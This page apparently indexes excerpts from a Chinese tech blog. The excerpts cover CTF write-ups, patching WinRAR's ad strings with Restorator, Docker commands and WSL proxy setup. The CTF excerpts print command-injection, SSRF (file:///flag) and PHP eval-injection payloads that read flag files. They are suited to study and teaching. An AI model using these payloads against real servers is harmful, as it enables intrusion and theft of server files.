梦~醒🍇

[TOC] websecure_shell 考点：exec()无回显 对于这类题有个很简单的方法，直接将flag写进文件，然后路径读取就行 先测试一下能不能执行 cmd=1;sleep 4 发现反应了4秒，能执行 然后直接 cat /f* > 1.txt 最后访问/1.txt路径就行 pyssrf 考点：ssrf漏洞 打开有个提示 /get?site= 直接file读取flag /get?site=file:///flag 碎碎念：以为很难。。。试了半天。。。。 misc一闪一闪亮晶晶 考点：凯撒与base64结合，starry语言 根据提示，“凯撒大帝想学习一下Starry语言，你能帮帮他么吗”，一定跟凯撒密码和starry语言有关。 下载文件，是一串重复度非常高的字符串 1JDBhJDBsJDBhJDBsJDBhJDBhJDBsJDBrJDBhJDBhLzphJDBhJDBhJDthJDphJDBhJDtrJDBhJDBhJDBsJDBrJDBhJDBhJ ...

Restorator常见使用方法有哪些？案例一：解决WinRAR弹出广告1、导出rc文件WinRAR安装完成后，用Restorator 2018打开安装目录WinRAR.exe。点开“打开”对话框后，通过WinRAR的安装路径，找到这个exe程序，然后点击“打开”。 Restorator 2018界面主要分为左右两个区，左边是资源树，我们点击“字符串”左边的加号，在展开的项目中，右键点击“中文”，然后选择“导出”→“导出为.rc”，保存到桌面： 2、打开rc文件上一步会导出一个.rc后缀的文件到指定位置。这一步我们去找到这个文件。如下图所示，我将导出的文件命名为“WinRAR导出分析-中文(简体，中-国).rc”，找到它，右键点开菜单后选择“打开方式”，然后用记事本的方式打开它也可以用文本编辑工具（notepad++）修改： 注意选择用记事本打开这个.rc文件时，不要勾选“始终用此应用打开.rc文件”。 3、定位弹广代码这一步很关键。下图就是用记事本打开.rc文件的样子，可以看到每一行都有个序数，后面引号里是一个可执行操作的名字。我们需要找到有关弹窗广告的代码，并用合适的方式覆 ...

[TOC] 优雅删除镜像（推荐做法）1、查看Docker要删除的镜像，如目标版本为stable-perl的Nginx，镜像ID（IMAGE ID）为 df1998569adb。 1docker images 2、使用命令“docker rmi 镜像ID”删除Nginx（stable-perl）的镜像，只取“IMAGE ID”的前3个字符即可。 1docker rmi df1   报错内容如下，意思是镜像（df1）存在使用中的容器（f66），不能强制删除镜像。官方的意思是要先停止容器运行，再进行镜像的删除操作吗？ 1Error response from daemon: conflict: unable to delete df1998569adb (cannot be forced) - image is being used by running container f6678f2821c7 3、查看Docker运行中的容器，如容器 nginx:stable-perl ，容器ID为 f66。 1docker ps 4、先停止nginx:stable-perl容器（f66）运行 ...

docker run ：创建一个新的容器并运行一个命令 123456789101112131415161718192021222324252627282930313233343536373839语法docker run [OPTIONS] IMAGE [COMMAND] [ARG...]OPTIONS说明：-a stdin: 指定标准输入输出内容类型，可选 STDIN/STDOUT/STDERR 三项；-d: 后台运行容器，并返回容器ID；-i: 以交互模式运行容器，通常与 -t 同时使用；-P: 随机端口映射，容器内部端口随机映射到主机的端口-p: 指定端口映射，格式为：主机(宿主)端口:容器端口-t: 为容器重新分配一个伪输入终端，通常与 -i 同时使用；--name="nginx-lb": 为容器指定一个名称；--dns 8.8.8.8: 指定容器使用的DNS服务器，默认和宿主一致；--dns-search example.com: 指定容器DNS搜索域名，默认和宿主一致；-h "mars": 指定容器的hostname；-e userna ...

[TOC] 以Ubuntu + Clash为例由Jeza Chen 发表于 June 3, 2020 最近使用WSL发现无法访问github相关的网站，基本都是Connection Refused，即便Windows系统使用了Clash也不能访问，按照网上一些教程，需要在WSL上进行一些配置才能用到系统的代理。 下面的操作基于WSL下的Ubuntu 20.04 LTS，主机代理软件为Clash。 在Clash软件找到HTTP代理端口(即软件里面的Port)，如下图的7890。 在c盘的用户文件中创建.wslconfig文件，复制以下代码 123456 [experimental] autoMemoryReclaim=gradualnetworkingMode=mirrored dnsTunneling=true firewall=true autoProxy=true 在WSL的终端上输入 1vim ~/.bashrc 1234，在末行写入export http_proxy=127.0.0.1:7890export https_proxy=127.0.0. ...

[TOC] webCodeInject 考点：命令执行 12345678<?php#Author: h1xaerror_reporting(0);show_source(__FILE__);eval("var_dump((Object)$_POST[1]);"); 直接构造联合执行。 payload: 11=1);system('ls /'); # 11=1);system('cat /000f1ag.txt'); # ctfshow{729e8c3e-142b-447a-8186-86cdac43b7a1} tpdoor 考点：thinkphp漏洞 打开网址发现，就一句话，什么都没有 先下载源码 1234567891011121314151617181920212223242526272829<?phpnamespace app\controller;use app\BaseController;use think\facade\Db;class Index extends BaseCon ...